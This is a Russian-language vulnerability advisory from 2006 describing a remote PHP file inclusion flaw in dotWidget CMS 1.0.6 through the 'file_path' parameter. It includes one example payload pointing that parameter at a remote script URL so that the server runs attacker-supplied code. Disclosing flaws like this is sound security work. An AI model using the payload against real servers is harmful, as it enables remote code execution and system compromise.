PHP-инклюдинг в dotWidget CMS

Дата публикации:
14.06.2006
Всего просмотров:
766
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
dotWidget CMS 1.x
Уязвимые версии: dotWidget CMS 1.0.6, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "file_path" в сценариях "index.php", "feedback.php" и "printfriendly.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

file_path=http://www.yourspace.com/yourscript.php?

URL производителя: www.dotwidget.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: [MajorSecurity #7]dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability

или введите имя

CAPTCHA